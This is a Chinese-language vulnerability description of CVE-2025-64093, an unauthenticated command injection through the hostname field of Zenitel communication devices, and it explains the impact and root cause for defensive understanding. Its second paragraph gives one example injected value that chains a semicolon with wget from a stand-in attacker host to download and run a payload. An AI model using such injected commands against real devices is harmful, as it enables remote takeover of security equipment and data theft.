CVE-2025-64093CVE-2025-64093是Zenitel公司设备中发现的一个严重远程代码执行漏洞,CVSS评分达到满分10.0。该漏洞允许未经身份验证的攻击者通过注入任意命令到设备主机名(hostname)字段来执行任意代码。由于该漏洞可通过网络远程利用且无需任何认证,对暴露在网络中的设备构成极其严重的安全威胁。攻击成功意味着攻击者可以完全控制目标设备,获取敏感数据、修改系统配置、甚至将受感染设备作为进一步攻击内网的跳板。Zenitel作为专业的通信和安全设备制造商,其设备通常部署在企业、医院、政府机构等重要场所,一旦被攻击可能导致严重的物理安全和信息安全后果。该漏洞的存在表明设备在处理主机名输入时缺乏充分的输入验证和命令隔离机制,将用户输入直接传递给系统命令执行环境。
该漏洞的根本原因在于Zenitel设备在处理主机名配置时未对用户输入进行充分的输入验证和命令隔离。设备Web管理界面或API接口接收主机名参数后,直接将用户提供的字符串拼接到系统命令中执行,而未进行任何命令注入防护(如特殊字符转义或输入白名单验证)。攻击者可以通过发送精心构造的HTTP请求,在主机名字段中注入Shell命令元字符(如分号、管道符、反引号等),使设备在解析或应用主机名时执行攻击者指定的任意系统命令。例如,攻击者可以注入类似'; wget http://attacker.com/malware -O /tmp/payload.sh && chmod +x /tmp/payload.sh && /tmp/payload.sh #'的命令,实现远程代码下载和执行。由于设备通常以root权限运行服务,攻击者可以直接获得完整的系统控制权限,执行任意操作包括安装后门、窃取数据或破坏系统功能。